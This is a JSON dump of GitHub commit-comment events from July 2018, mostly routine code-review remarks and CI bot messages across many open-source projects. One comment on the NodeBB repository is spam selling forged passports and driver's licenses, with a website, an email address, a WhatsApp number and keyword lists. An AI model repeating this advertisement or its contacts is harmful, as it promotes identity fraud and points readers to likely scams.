{"id":"7920275794","type":"CommitCommentEvent","actor":{"login":"hoodie"},"repo":{"name":"h4llow3En/mac-notification-sys"},"payload":{"comment":{"id":29600045,"position":238,"line":170,"path":"src/lib.rs","commit_id":"13b7fddc82672515cdc40dc920a12f7c0a6bd8d4","created_at":"2018-07-04T22:42:36Z","updated_at":"2018-07-04T22:42:36Z","author_association":"COLLABORATOR","body":"this change is beautiful! good job :+1: "}},"created_at":"2018-07-04T22:42:36Z"}
{"id":"7920276404","type":"CommitCommentEvent","actor":{"login":"hoodie"},"repo":{"name":"h4llow3En/mac-notification-sys"},"payload":{"comment":{"id":29600049,"position":238,"line":170,"path":"src/lib.rs","commit_id":"13b7fddc82672515cdc40dc920a12f7c0a6bd8d4","created_at":"2018-07-04T22:43:03Z","updated_at":"2018-07-04T22:43:03Z","author_association":"COLLABORATOR","body":"I mean the entire commit of course"}},"created_at":"2018-07-04T22:43:03Z"}
{"id":"7920277546","type":"CommitCommentEvent","actor":{"login":"wizardofid"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29600052,"position":null,"line":null,"path":null,"commit_id":"a50edc3d25df871c89fd03b1beb12dea9db663f9","created_at":"2018-07-04T22:43:51Z","updated_at":"2018-07-04T22:43:51Z","author_association":"NONE","body":"@greyson-signal \r\nFine job, does what it should and i didn't notice a higher battery consumption than before.\r\nBut it seems to help only one-to-one chats. Group chats seem to behave unchanged. Is this intended or should i open an issue and submit a debug log?"}},"created_at":"2018-07-04T22:43:51Z"}
{"id":"7920277862","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600053,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:44:06Z","updated_at":"2018-07-04T22:44:06Z","author_association":"MEMBER","body":"thinking about this a bit more: \r\n\r\nis `fn init` going  to generate an http  trigger or not?\r\n \r\nWas assuming we would do this for consistency with current docs/narratives but actually I wonder if changing the narrative is better. \r\n\r\nif `fn call` works without a trigger then I think all of the above func.yamls could be valid `new` func.yamls but without any triggers.  \r\n\r\nso in practice coud, wahat  is changing  be that existing func.yaml would just not create http endpoints? (but still worked with fn call) \r\n\r\nright now I think most of our introductary material does: \r\n\r\n* `fn init`\r\n* (`fn run`) (same) \r\n* `fn call`\r\n* `curl  endpoint`\r\n\r\nI wonder if just change that to: \r\n* `fn init`\r\n* `fn run` \r\n* `fn call` (via invoke) \r\n*  (expose trigger) either via func.yaml  or CLI\r\n* (curl) \r\n"}},"created_at":"2018-07-04T22:44:06Z"}
{"id":"7920279017","type":"CommitCommentEvent","actor":{"login":"rikgibson"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600055,"position":11,"line":8,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:44:50Z","updated_at":"2018-07-04T22:44:50Z","author_association":"CONTRIBUTOR","body":"`api-version: 2` maybe? That would tie up at least with the swagger, which is effectively part of our public interface, unless there is a plan to roll the swagger version back to v1 once v2 is complete and the old v1 is ripped out.  But equally not existing at all is probably better."}},"created_at":"2018-07-04T22:44:50Z"}
{"id":"7920281470","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600061,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:46:25Z","updated_at":"2018-07-04T22:46:25Z","author_association":"MEMBER","body":"In particular I'm thinking about a world where having an HTTP trigger is the exception rather than the norm. "}},"created_at":"2018-07-04T22:46:25Z"}
{"id":"7920281898","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29600062,"position":null,"line":null,"path":null,"commit_id":"94fef94d9c8571db255b0f3694617f5cd56825b8","created_at":"2018-07-04T22:46:38Z","updated_at":"2018-07-04T22:46:38Z","author_association":"COLLABORATOR","body":"By compiling it obviously."}},"created_at":"2018-07-04T22:46:38Z"}
{"id":"7920282043","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29600063,"position":null,"line":null,"path":null,"commit_id":"fce1e4c135e7a693c01baa1ba755d2bd98181ae9","created_at":"2018-07-04T22:46:44Z","updated_at":"2018-07-04T22:46:44Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/64/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/64//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fce1e4c135e7a693c01baa1ba755d2bd98181ae9/64/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fce1e4c135e7a693c01baa1ba755d2bd98181ae9/64/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fce1e4c135e7a693c01baa1ba755d2bd98181ae9/64/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/fce1e4c135e7a693c01baa1ba755d2bd98181ae9/64/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-04T22:46:44Z"}
{"id":"7920282335","type":"CommitCommentEvent","actor":{"login":"csaayu"},"repo":{"name":"csaayu/BotPrueba"},"payload":{"comment":{"id":29600064,"position":6,"line":5,"path":"hello-word.xml","commit_id":"84a2f815dc34e2c5a7fd68c03e8fbc094194a31d","created_at":"2018-07-04T22:46:58Z","updated_at":"2018-07-04T22:46:58Z","author_association":"OWNER","body":"warning delete"}},"created_at":"2018-07-04T22:46:58Z"}
{"id":"7920282828","type":"CommitCommentEvent","actor":{"login":"rikgibson"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600065,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:47:17Z","updated_at":"2018-07-04T22:47:17Z","author_association":"CONTRIBUTOR","body":"@zootalures see https://github.com/fnproject/cli/issues/324 for discussion of extending `fn init` to optionally create an accompanying trigger."}},"created_at":"2018-07-04T22:47:17Z"}
{"id":"7920282904","type":"CommitCommentEvent","actor":{"login":"csaayu"},"repo":{"name":"csaayu/BotPrueba"},"payload":{"comment":{"id":29600066,"position":null,"line":null,"path":null,"commit_id":"84a2f815dc34e2c5a7fd68c03e8fbc094194a31d","created_at":"2018-07-04T22:47:21Z","updated_at":"2018-07-04T22:47:21Z","author_association":"OWNER","body":"Save"}},"created_at":"2018-07-04T22:47:21Z"}
{"id":"7920283435","type":"CommitCommentEvent","actor":{"login":"burdges"},"repo":{"name":"ebfull/ff"},"payload":{"comment":{"id":29600068,"position":null,"line":null,"path":null,"commit_id":"2067360930fbf07b74109fe776c4260766046816","created_at":"2018-07-04T22:47:44Z","updated_at":"2018-07-04T22:47:44Z","author_association":"NONE","body":"I'm curious:  What is this useful for?"}},"created_at":"2018-07-04T22:47:44Z"}
{"id":"7920284351","type":"CommitCommentEvent","actor":{"login":"cneira"},"repo":{"name":"omniosorg/illumos-omnios"},"payload":{"comment":{"id":29600075,"position":null,"line":null,"path":null,"commit_id":"19545047a336b8d4dfc76dea2bdc69089f9f2269","created_at":"2018-07-04T22:48:21Z","updated_at":"2018-07-04T22:48:21Z","author_association":"NONE","body":"Looks good to me. Ship it!"}},"created_at":"2018-07-04T22:48:21Z"}
{"id":"7920288650","type":"CommitCommentEvent","actor":{"login":"huanle0610"},"repo":{"name":"huanle0610/docker-php7-composer"},"payload":{"comment":{"id":29600080,"position":null,"line":null,"path":null,"commit_id":"40bfd67229b82178373409e1748969bd65a2dc47","created_at":"2018-07-04T22:51:11Z","updated_at":"2018-07-04T22:51:11Z","author_association":"OWNER","body":"use centos:latest"}},"created_at":"2018-07-04T22:51:11Z"}
{"id":"7920289921","type":"CommitCommentEvent","actor":{"login":"francocatena"},"repo":{"name":"cirope/mawidabp"},"payload":{"comment":{"id":29600082,"position":10,"line":10,"path":"app/models/concerns/tasks/due_on_dates.rb","commit_id":"f9538014840e9d0e2938eb3012c4d08cfc3a8c5a","created_at":"2018-07-04T22:52:05Z","updated_at":"2018-07-04T22:52:05Z","author_association":"MEMBER","body":"Hermoso ver esos ```return``` irse."}},"created_at":"2018-07-04T22:52:05Z"}
{"id":"7920290078","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29600083,"position":null,"line":null,"path":null,"commit_id":"12067be38994f50f747bb76873369849a8fa67a6","created_at":"2018-07-04T22:52:11Z","updated_at":"2018-07-04T22:52:11Z","author_association":"OWNER","body":"Comment"}},"created_at":"2018-07-04T22:52:11Z"}
{"id":"7920290482","type":"CommitCommentEvent","actor":{"login":"francocatena"},"repo":{"name":"cirope/mawidabp"},"payload":{"comment":{"id":29600084,"position":13,"line":114,"path":"app/models/concerns/findings/csv.rb","commit_id":"f9538014840e9d0e2938eb3012c4d08cfc3a8c5a","created_at":"2018-07-04T22:52:27Z","updated_at":"2018-07-04T22:52:27Z","author_association":"MEMBER","body":"Mejor con la constante (mencionada en el correo de recién) ;)"}},"created_at":"2018-07-04T22:52:27Z"}
{"id":"7920290563","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29600085,"position":null,"line":null,"path":null,"commit_id":"a3ebab0b852113877cc3302ea4d38429b60d0e4c","created_at":"2018-07-04T22:52:30Z","updated_at":"2018-07-04T22:52:30Z","author_association":"COLLABORATOR","body":"Reverted, can't verify that works on an actual 21:9 screen "}},"created_at":"2018-07-04T22:52:30Z"}
{"id":"7920291674","type":"CommitCommentEvent","actor":{"login":"Shelvak"},"repo":{"name":"cirope/mawidabp"},"payload":{"comment":{"id":29600089,"position":10,"line":10,"path":"app/models/concerns/tasks/due_on_dates.rb","commit_id":"f9538014840e9d0e2938eb3012c4d08cfc3a8c5a","created_at":"2018-07-04T22:53:16Z","updated_at":"2018-07-04T22:53:16Z","author_association":"COLLABORATOR","body":"si, una maravilla moderna el any? jaja me di cuenta la 2º vez que lo escribí xD"}},"created_at":"2018-07-04T22:53:16Z"}
{"id":"7920293889","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/lawfactory_utils"},"payload":{"comment":{"id":29600095,"position":null,"line":null,"path":null,"commit_id":"6df5aab20dd212e5218d4ed0f1c825738a9d94c8","created_at":"2018-07-04T22:54:48Z","updated_at":"2018-07-04T22:54:48Z","author_association":"MEMBER","body":"arf, then the fix is gonna be in anpy I guess"}},"created_at":"2018-07-04T22:54:48Z"}
{"id":"7920295635","type":"CommitCommentEvent","actor":{"login":"haykam821"},"repo":{"name":"xSke/Pxls"},"payload":{"comment":{"id":29600101,"position":null,"line":null,"path":null,"commit_id":"ebf35d73a9273e8c0f8d9e2650c22bba1f0a8dbf","created_at":"2018-07-04T22:56:02Z","updated_at":"2018-07-04T22:56:02Z","author_association":"CONTRIBUTOR","body":"❤️🧡💛💚💙💜❤️🧡💛💚💙💜❤️🧡💛💚💙💜❤️ Nice."}},"created_at":"2018-07-04T22:56:02Z"}
{"id":"7920309195","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29600133,"position":null,"line":null,"path":null,"commit_id":"94b2d8106019067ea2890702c63f39578db06662","created_at":"2018-07-04T23:04:58Z","updated_at":"2018-07-04T23:04:58Z","author_association":"CONTRIBUTOR","body":"@allanrenucci What's the reason for this commit? It breaks my workflow because I was using `git-worktree` to checkout multiple branches, and that's unsupported since 3 years (https://bugs.eclipse.org/bugs/show_bug.cgi?id=477475). I use that workflow to avoid needing a full rebuild every time I switch branches — I rather use a different checkout.\r\n\r\nIf there's a good reason, I can try to switch to a more complex workflow, or try to fix the issue another way."}},"created_at":"2018-07-04T23:04:58Z"}
{"id":"7920313597","type":"CommitCommentEvent","actor":{"login":"suujia"},"repo":{"name":"bcgsc/orca"},"payload":{"comment":{"id":29600151,"position":null,"line":null,"path":null,"commit_id":"059b33c39defe60e7a5d30742921eedd5a65db75","created_at":"2018-07-04T23:08:01Z","updated_at":"2018-07-04T23:08:01Z","author_association":"CONTRIBUTOR","body":"Trigger singularity hub rebuild \r\n- indent\r\n- fixed some errors from building locally: \r\n\r\nremoved rstudio-server Homebrew/homebrew-science#6507\r\nadded brew tap brewsci/bio \r\nchanged homebrew/science to brewsci/science\r\n "}},"created_at":"2018-07-04T23:08:01Z"}
{"id":"7920313923","type":"CommitCommentEvent","actor":{"login":"datumbox"},"repo":{"name":"tensorflow/tensor2tensor"},"payload":{"comment":{"id":29600153,"position":39,"line":57,"path":"tensor2tensor/models/shake_shake.py","commit_id":"468a8f3f1ed5b2dbbf468d5d316ebb800109d23a","created_at":"2018-07-04T23:08:14Z","updated_at":"2018-07-04T23:08:14Z","author_association":"NONE","body":"@lukaszkaiser Apologies I understand that this commit is old but I just bumped into it.\r\n\r\nIn the previous code the `shake_shake_branch()` was building the convs and then the 2 branches were shaked with `alpha` and `1-alpha` using the `common_layers.shakeshake2*()` methods. This approach is very much aligned to the paper.\r\n\r\nYour update brings the shake part in the `shake_shake_branch()` method which means that each branch is being shaked with 2 different alphas (not alpha and 1-alpha). I understand that your code extends shake-shake to support more than 2 branches and as a result separate alphas is very convinient in the code. Nevertheless can you provide a bit more info or references on this change? "}},"created_at":"2018-07-04T23:08:14Z"}
{"id":"7920314130","type":"CommitCommentEvent","actor":{"login":"goodsoft"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29600155,"position":32,"line":163,"path":"ui/vty/src/Ariadne/UI/Vty/App.hs","commit_id":"6d4278c6f894a4a639019de3468d2e15c27c07e7","created_at":"2018-07-04T23:08:23Z","updated_at":"2018-07-04T23:08:23Z","author_association":"CONTRIBUTOR","body":"Oh yeah, more funny ways to compose freaking functions :roll_eyes: "}},"created_at":"2018-07-04T23:08:23Z"}
{"id":"7920317935","type":"CommitCommentEvent","actor":{"login":"kshal88"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29600172,"position":15,"line":663,"path":"Lib/test/_test_multiprocessing.py","commit_id":"eb700f8c94602feb8c10ad8fc600f55e17e3b092","created_at":"2018-07-04T23:10:51Z","updated_at":"2018-07-04T23:10:51Z","author_association":"NONE","body":"clear"}},"created_at":"2018-07-04T23:10:51Z"}
{"id":"7920318281","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29600173,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-04T23:11:06Z","updated_at":"2018-07-04T23:11:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T23:11:06Z"}
{"id":"7920320664","type":"CommitCommentEvent","actor":{"login":"SamuiNe"},"repo":{"name":"SamuiNe/Crystalline-css"},"payload":{"comment":{"id":29600174,"position":15,"line":4277,"path":"crystalline.css","commit_id":"47f372509ef85eb78e33c1ec8755e06a4a41f058","created_at":"2018-07-04T23:12:41Z","updated_at":"2018-07-04T23:12:41Z","author_association":"OWNER","body":"Minor fix at the Game Hub too"}},"created_at":"2018-07-04T23:12:41Z"}
{"id":"7920322086","type":"CommitCommentEvent","actor":{"login":"em3thyst"},"repo":{"name":"em3thyst/pixelartproject"},"payload":{"comment":{"id":29600175,"position":null,"line":null,"path":null,"commit_id":"3ca6808e7dddc8502ff20174b8e2cc01059c2795","created_at":"2018-07-04T23:13:36Z","updated_at":"2018-07-04T23:13:36Z","author_association":"OWNER","body":"+https://em3thyst.github.io/pixelartproject/\r\n"}},"created_at":"2018-07-04T23:13:36Z"}
{"id":"7920322180","type":"CommitCommentEvent","actor":{"login":"emmanuel181285"},"repo":{"name":"emmanuel181285/ArquitecturadeCom"},"payload":{"comment":{"id":29600176,"position":null,"line":null,"path":null,"commit_id":"c9bfc24b8e6c66fbb4eb5d918796a74afec6b539","created_at":"2018-07-04T23:13:41Z","updated_at":"2018-07-04T23:13:41Z","author_association":"OWNER","body":"this was a test, please ignore"}},"created_at":"2018-07-04T23:13:41Z"}
{"id":"7920322678","type":"CommitCommentEvent","actor":{"login":"wirba"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29600178,"position":null,"line":null,"path":null,"commit_id":"d0997ed83f53faba4a7395d340f551561a54939f","created_at":"2018-07-04T23:14:03Z","updated_at":"2018-07-04T23:14:03Z","author_association":"NONE","body":"Buy real passport and driver's license Website....((www.buydocsonline247.com)WhatsApp number:(( + 61 434 493 569))\r\n\r\n\r\n\r\nBest quality novelty fake passports and passports, marriage certificates and driving\r\n\r\nlicense etc. now buy high quality We have the best holograms and duplicating machines with\r\n\r\nover 12 millions of documents circulating around the world.\r\n\r\nIDs scan yes ...\r\n\r\n-HOLOGRAMS: Identical\r\n\r\n-BAR CODES: IDS SCAN\r\n\r\n-UV: YES\r\nwebsite.......((www.buydocsonline247.com)\r\n\r\nContact emails:((tentienactie@gmail.com))\r\n\r\nWhatsApp number:(( + 61 434 493 569))\r\n\r\nWhatsApp number: (( + 61 434 493 569))\r\n\r\nFake IDs available for more than 50 state driver license cards and state ID cards. Contains\r\n\r\nthe state driver's license hologram and magnetic stripe or bar code on the back. 2 working\r\n\r\nday shipping order (2.95 shipping cost). The BEST authentic fake IDs on the net. Same\r\n\r\nquality, high resolution, the Department of Motor Vehicles use. Sending current .JPG or\r\n\r\n.GIF of the current license with image and changes in NAME, DOB, license #, restrictions\r\n\r\netc. We produce the best fake ID online-we UK / EU fake ID, Canadian fake ID, Australian\r\n\r\nfake ID and fake selling IDs for many other countries from fake passports to fake driving\r\n\r\nlicenses fake account statements, we have covered your identification needs. Our fake ID\r\n\r\ncards are all security features such as true holograms, UV watermarks, gravure, specialty\r\n\r\npaper, fluorescent dyes, RF ID chips, barcodes according to your data and more. Our fake\r\n\r\nbadges are identical to the real thing no other side you offer this quality we are the\r\n\r\nbest.\r\n\r\nnew identity, protect your privacy and freedom back.\r\n\r\nkeywords\r\n\r\nfake Spanish (Spain) passports for sale,\r\n\r\nfake Mexican (Mexico) passports for sale,\r\n\r\nfake South African passports for sale,\r\n\r\nfake Australian driver licenses for sale,\r\n\r\nfake Canadian drivers licenses for sale,\r\n\r\nfake diplomatic passports for sale,\r\n\r\nwrong USA (United States) passports for sale,\r\n\r\nfalse australian passports for sale,\r\n\r\nwrong Belgium passports for sale,\r\n\r\nwrong Brazilian (Brazil) passports for sale,\r\n\r\nfalse Canadian (Canada) passports for sale,\r\n\r\nfake Finnish (Finland) passports for sale,\r\n\r\nwrong French (France) passports for sale,\r\n\r\nwrong German (Germany) passports for sale,\r\n\r\nwrong Dutch (Netherlands / Holland) passports for sale,\r\n\r\nwrong Israel passports for sale,\r\n\r\nwrong UK (United Kingdom) passports for sale,\r\n\r\nwrong Spanish (Spain) passports for sale,\r\n\r\nfake Mexican (Mexico) passports for sale,\r\n\r\nwrong South African passports for sale,\r\n\r\nfake Australian driving licenses for sale,\r\n\r\nCamouflage passes for sale,\r\n\r\nPass Duplicated for sale.\r\n\r\norder fake passports,\r\n\r\norder wrong passports,\r\n\r\norder novelty passports,\r\n\r\norder fake driver's license,\r\n\r\nTo wrong driver's license,\r\n\r\norder novelty driver's license,\r\n\r\norder diplomatic passports,\r\n\r\nget fake passports,\r\n\r\nget wrong passports,\r\n\r\nreceive novelty passports,\r\n\r\nget fake driver's license,\r\n\r\nget wrong driver's license,\r\n\r\nget novelty driver's license,\r\n\r\nreceive diplomatic passports,\r\n\r\nbuy fake passports,\r\n\r\nbuy fake passports,\r\n\r\nbuy novelty passports,\r\n\r\nbuy fake driver's license,\r\n\r\nbuy wrong driver's license,\r\n\r\nbuy novelty driver's license,\r\n\r\nbuy diplomatic passports,\r\n\r\nsell fake passports,\r\n\r\nsell wrong passports,\r\n\r\nsell novelty passports,\r\n\r\nsell fake driver's license,\r\n\r\nsell wrong driver's license,\r\n\r\nsell novelty driver's license,\r\n\r\nget fake passports,\r\n\r\nget wrong passports,\r\n\r\nreceive novelty passports,\r\n\r\nget fake driver's license,\r\n\r\nget wrong driver's license,\r\n\r\nget novelty driver's license,\r\n\r\nreceive diplomatic passports,\r\n\r\nmake fake passports,\r\n\r\nmake false passports,\r\n\r\nmake novelty passports,\r\n\r\nmake fake driver's license,\r\n\r\nmake wrong driver's license,\r\n\r\nmake novelty driver's license,\r\n\r\nmake diplomatic passports\r\n \r\nContact emails:........((tentienactie@gmail.com))\r\n\r\nwebsite.......((www.buydocsonline247.com\r\n\r\nWhatsApp number:........(( + 61 434 493 569))\r\n\r\nWhatsApp number: (( + 61 434 493 569))### "}},"created_at":"2018-07-04T23:14:03Z"}
{"id":"7920324452","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29600183,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-04T23:15:17Z","updated_at":"2018-07-04T23:15:17Z","author_association":"MEMBER","body":"refer to the javadoc of expression type:\r\nhttps://github.com/SkriptLang/Skript/blob/8c26dca2f0520bbac0e1817c8af58229b1a05669/src/main/java/ch/njol/skript/lang/ExpressionType.java#L39-L44\r\nIt doesn't mention anything about it having two or more expressions"}},"created_at":"2018-07-04T23:15:17Z"}
{"id":"7920326021","type":"CommitCommentEvent","actor":{"login":"javabrett"},"repo":{"name":"requests/httpbin"},"payload":{"comment":{"id":29600187,"position":567,"line":630,"path":"httpbin/core.py","commit_id":"660801081cc485754720a11cc83a03c4c1df10e0","created_at":"2018-07-04T23:16:24Z","updated_at":"2018-07-04T23:16:24Z","author_association":"CONTRIBUTOR","body":"With reference to question by @eturk1 in #480 re #476 - my change on the left here is an attempt to allow `POST`, `PATCH` and `PUT` to pass both `url` (required) and `status_code` (optional, default `302`) as `formData`, as you might expect with these methods.  It supported only `x-www-form-encoded` bodies (no JSON payloads).\r\n\r\nHowever it did break [this test]https://github.com/requests/httpbin/blob/master/test_httpbin.py#L588) which presumes that you can also pass these parameters for `POST` in the query-string, which is why @kennethreitz has reverted it.  So `POST` would not work again now.\r\n\r\n@kennethreitz assuming the test remains valid and you should be able to continue to pass these parameters for `POST` and the other methods (I can't see why not), shall we just change this to have any form-data _override_ any query-string params (for these methods only), so allowing both?  Or is there a reason we would want to for forbid the form-data versions?\r\n\r\n... I'll write a test too!"}},"created_at":"2018-07-04T23:16:24Z"}
{"id":"7920330280","type":"CommitCommentEvent","actor":{"login":"kennethreitz"},"repo":{"name":"requests/httpbin"},"payload":{"comment":{"id":29600193,"position":null,"line":null,"path":null,"commit_id":"660801081cc485754720a11cc83a03c4c1df10e0","created_at":"2018-07-04T23:19:28Z","updated_at":"2018-07-04T23:19:28Z","author_association":"MEMBER","body":"you can post, just use a query parameter. "}},"created_at":"2018-07-04T23:19:28Z"}
{"id":"7920330833","type":"CommitCommentEvent","actor":{"login":"ScorchEmber256"},"repo":{"name":"jarveson/rpcs3"},"payload":{"comment":{"id":29600194,"position":null,"line":null,"path":null,"commit_id":"5f4455eff7a08aec1481d7842fd3079deb20dca1","created_at":"2018-07-04T23:19:51Z","updated_at":"2018-07-04T23:19:51Z","author_association":"NONE","body":"Dude, I wasn't asking for a smart ass response... I don't know how it works, I'm just generally intrigued that's all."}},"created_at":"2018-07-04T23:19:51Z"}
{"id":"7920333056","type":"CommitCommentEvent","actor":{"login":"nobodxbodon"},"repo":{"name":"HL4A/hl4a-core"},"payload":{"comment":{"id":29600197,"position":null,"line":null,"path":null,"commit_id":"34d2a990af25e0e28535be1dd4c48e7b5653a0d1","created_at":"2018-07-04T23:21:23Z","updated_at":"2018-07-04T23:21:23Z","author_association":"NONE","body":"重构很溜啊. 现在用什么IDE?"}},"created_at":"2018-07-04T23:21:23Z"}
{"id":"7920334046","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29600198,"position":null,"line":null,"path":null,"commit_id":"2446384d762563d50b432455d07829d37d805dd3","created_at":"2018-07-04T23:22:08Z","updated_at":"2018-07-04T23:22:08Z","author_association":"OWNER","body":"Only the forked esp-idf will be supported.  This is due to a required patch that is not upstream."}},"created_at":"2018-07-04T23:22:08Z"}
{"id":"7920334055","type":"CommitCommentEvent","actor":{"login":"felixbroehl"},"repo":{"name":"eduardoRoth/ionic-image-loader"},"payload":{"comment":{"id":29600199,"position":54,"line":387,"path":"src/providers/image-loader.ts","commit_id":"d2b3c936ddec85eb7fbd46c40a752840b1fb4701","created_at":"2018-07-04T23:22:08Z","updated_at":"2018-07-04T23:22:08Z","author_association":"NONE","body":"not sure if this line is required"}},"created_at":"2018-07-04T23:22:08Z"}
{"id":"7920334116","type":"CommitCommentEvent","actor":{"login":"felixbroehl"},"repo":{"name":"eduardoRoth/ionic-image-loader"},"payload":{"comment":{"id":29600200,"position":55,"line":388,"path":"src/providers/image-loader.ts","commit_id":"d2b3c936ddec85eb7fbd46c40a752840b1fb4701","created_at":"2018-07-04T23:22:10Z","updated_at":"2018-07-04T23:22:10Z","author_association":"NONE","body":"not sure if this line is required"}},"created_at":"2018-07-04T23:22:10Z"}
{"id":"7920342887","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29600216,"position":null,"line":null,"path":null,"commit_id":"b54ba4c952d79d56742e76081d692f1281e88512","created_at":"2018-07-04T23:28:25Z","updated_at":"2018-07-04T23:28:25Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/insert-date-rendering-may-break-when-mixed-with-html/90959/7\n"}},"created_at":"2018-07-04T23:28:25Z"}
{"id":"7920343195","type":"CommitCommentEvent","actor":{"login":"rhand25"},"repo":{"name":"sooti/android_device_xiaomi_tissot-1"},"payload":{"comment":{"id":29600218,"position":null,"line":null,"path":null,"commit_id":"f995e3f9d14691e03061b48899541caa3fb25c41","created_at":"2018-07-04T23:28:38Z","updated_at":"2018-07-04T23:28:38Z","author_association":"NONE","body":"Wheres the downloadl8nk"}},"created_at":"2018-07-04T23:28:38Z"}
{"id":"7920345667","type":"CommitCommentEvent","actor":{"login":"eduardoRoth"},"repo":{"name":"eduardoRoth/ionic-image-loader"},"payload":{"comment":{"id":29600223,"position":55,"line":388,"path":"src/providers/image-loader.ts","commit_id":"d2b3c936ddec85eb7fbd46c40a752840b1fb4701","created_at":"2018-07-04T23:30:20Z","updated_at":"2018-07-04T23:30:20Z","author_association":"OWNER","body":"I guess not, even if you get an existing full cache directory from `createCacheDirectory`, the next time you tried to cache a new image it'd free space."}},"created_at":"2018-07-04T23:30:20Z"}
{"id":"7920346801","type":"CommitCommentEvent","actor":{"login":"CTCaer"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29600225,"position":null,"line":null,"path":null,"commit_id":"a14f5546572469c3419e52c7bc0058ca27ac0122","created_at":"2018-07-04T23:31:04Z","updated_at":"2018-07-04T23:31:04Z","author_association":"OWNER","body":"The usleep with get_tmr_us() broke firmware launching.\r\nFor some reason, hekate didn't have time to get a positive value from the Security Monitor mailbox.\r\nA thorough test showed that nothing else had this problem. But to make sure both sleeps changed back to raw timer parsing."}},"created_at":"2018-07-04T23:31:04Z"}
{"id":"7920352262","type":"CommitCommentEvent","actor":{"login":"yperaboina"},"repo":{"name":"yperaboina/viveksele"},"payload":{"comment":{"id":29600234,"position":null,"line":null,"path":null,"commit_id":"be88d109e99fbf06c5c225384e915ae4ff5c52e9","created_at":"2018-07-04T23:34:34Z","updated_at":"2018-07-04T23:34:34Z","author_association":"OWNER","body":"the static block will execute first"}},"created_at":"2018-07-04T23:34:34Z"}
{"id":"7920354347","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"erri120/wrye-bash"},"payload":{"comment":{"id":29600238,"position":18,"line":18,"path":"Mopy/bash/bosh/fomods.py","commit_id":"0d9ff3e7c730d8d5ece885be300398a062f6700a","created_at":"2018-07-04T23:35:56Z","updated_at":"2018-07-04T23:35:56Z","author_association":"NONE","body":"name is not a good errr name either - filename you mean here ?"}},"created_at":"2018-07-04T23:35:56Z"}
